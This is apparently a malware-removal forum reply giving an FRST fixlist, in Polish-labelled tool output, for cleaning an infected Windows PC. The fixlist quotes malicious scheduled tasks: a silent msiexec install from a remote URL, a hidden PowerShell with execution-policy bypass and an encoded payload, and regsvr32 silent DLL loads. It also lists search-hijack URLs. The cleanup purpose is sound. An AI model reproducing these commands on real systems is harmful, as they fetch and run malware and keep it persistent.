Open the system Notepad and paste:

HKU\S-1-5-21-1393165460-243477947-2800629209-1000\...\ChromeHTML: -> "C:\Program Files\Eastness\Application\chrome.exe" "%1" <==== UWAGA
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
Task: {0000CAEE-BA36-4AED-8C47-0C7820405B91} - System32\Tasks\{0E544DB1-B9FF-FA1A-015B-F66C2572319A} => C:\ProgramData\{6B877452-DC2C-C3F9-F0E9-11513284F7B5}\218A4816-9621-FFBD-561D-973665502ACF.exe [2017-05-04] () <==== UWAGA
Task: {297223C1-884D-4154-8530-B378C095F36E} - System32\Tasks\{08DCB6D5-BF77-017E-57AD-A0F9C5DA80AC} => C:\ProgramData\{2051A677-97FA-11DC-AB72-2E7165FD0627}\A3AFF046-1404-47ED-39DE-100B5DD43BF7.exe [2017-05-04] () <==== UWAGA
Task: {5D73430C-D73E-4F66-B72C-E69D58C14F7C} - System32\Tasks\Tirationaneberse => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&v=201722 /q <==== UWAGA
Task: {859D9D6E-0A90-4924-A037-A9E681F306D3} - System32\Tasks\{0979B2ED-58AF-4DB1-848D-26FFA0939AD4} => C:\Windows\system32\pcalua.exe -a "C:\Users\Ja\Downloads\FIFA_Manager_12_Free_Full_Version_Game [1].exe" -d C:\Users\Ja\Downloads
Task: {8E3780B7-17A0-47E1-A546-B654C06F3786} - System32\Tasks\{0412CA95-B3B9-7D3E-916F-6A64F294CA8D} => C:\ProgramData\{15B80175-A213-B6DE-5ADC-DB6B3465FA74}\07CD52D9-B066-E572-B4C7-C4E0C5908799.exe [2017-05-04] () <==== UWAGA
Task: {A3900F8B-798C-4019-9883-0286470019E9} - System32\Tasks\{22E2F65C-6175-8ACE-EB7D-4267B008732F} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA
Task: {C0566BFE-66EF-4FAC-BD3C-41B1AB14F840} - System32\Tasks\SMW_UpdateTask_Time_3638373037353238372d2d37505a2a6c55326c342341 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== UWAGA
Task: {DA43372F-E5D9-4FE5-89C5-A6E1C6E148C9} - System32\Tasks\CD144EF0-EBE0-8690-1080-FF42C0880B4C => C:\Windows\system32\regsvr32.exe /n /s /i:"/02d02391816f39c5 /q" "C:\Users\Ja\AppData\Local\2ACBAE~1\{596DF~1."
Task: {F2402448-60F9-495B-BAB6-1F6960D5FA10} - System32\Tasks\{DBC7F7A1-2700-4670-933E-1DC1D8153D2D} => C:\Users\Ja\Downloads\Gry\LeagueofLegends_EUNE_Installer_2016_11_10 (1).exe
Task: {F6EFB0AC-B7C7-4038-87E2-30B85AD53143} - System32\Tasks\{1CBB9B44-75C2-4D32-9803-AC670903AF55} => C:\Riot Games\League of Legends\LeagueClient.exe [2017-12-14] ()
Task: {FB93235B-07B4-4365-B2A7-B7A34C8C7780} - System32\Tasks\{244BB31B-692D-62D7-3AF8-C144EAE28F00} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\57612869\596df20f.dll" <==== UWAGA
Task: {FD2A4DB2-76CF-4252-BAAD-B1C25C135AC8} - System32\Tasks\{08080E47-7E7E-0D0F-7E11-0A050E78110A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ACAAIAAgACAAIAAgADsAIAA7ACAAOwA7ACAAIAAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4A (dane wartości zawierają 9740 znaków więcej). <==== UWAGA
ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe,
ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epf&s=h1szamobl20488au,787d078b-ae6f-4ca2-9640-05aeebc03dbe,
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-1393165460-243477947-2800629209-1000\...\Run: [background_fault] => C:\Users\Ja\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <==== UWAGA
HKLM\...\Providers\81bd26iq: C:\Program Files\Terbaent Center\local32spl.dll [275968 2017-02-02] () <==== UWAGA
ShellExecuteHooks: Brak nazwy - {1215881A-DE48-11E6-9639-64006A5CFC23} - -> Brak pliku
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1393165460-243477947-2800629209-1000\Software\Microsoft\Internet Explorer\Main,Start Page =
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1393165460-243477947-2800629209-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1486390482&z=ce8d94c3d21d39fbe6fc238gazfbeq7c0t1ebz4b4g&from=che0812&uid=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1393165460-243477947-2800629209-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1486390482&z=ce8d94c3d21d39fbe6fc238gazfbeq7c0t1ebz4b4g&from=che0812&uid=ST9160411ASG_5TG1CE4CXXXX5TG1CE4C&q={searchTerms}
CHR Profile: C:\Users\Ja\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2018-01-06] <==== UWAGA
R2 MS_CHECK_SVC; C:\ProgramData\Microsoft\DeviceSync\LocalBackup.dll [487424 2017-02-08] () [Brak podpisu cyfrowego] <==== UWAGA
S2 ed2kidle; "C:\Program Files\amuleCe\ed2k.exe" -downloadwhenidle [X]
U0 aswVmm; Brak ImagePath
S1 iSafeKrnl; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA
S1 iSafeKrnlKit; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA
S1 iSafeKrnlMon; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
S1 iSafeKrnlR3; \??\C:\Program Files\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA
2018-01-06 18:17 - 2018-01-06 18:26 - 000000000 ____D C:\AdwCleaner
C:\Users\Ja\AppData\Local\background_fault\aswRD.exe
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder. Run FRST as administrator and click Fix/Napraw.

Scan with Malwarebytes Anti-Malware: http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/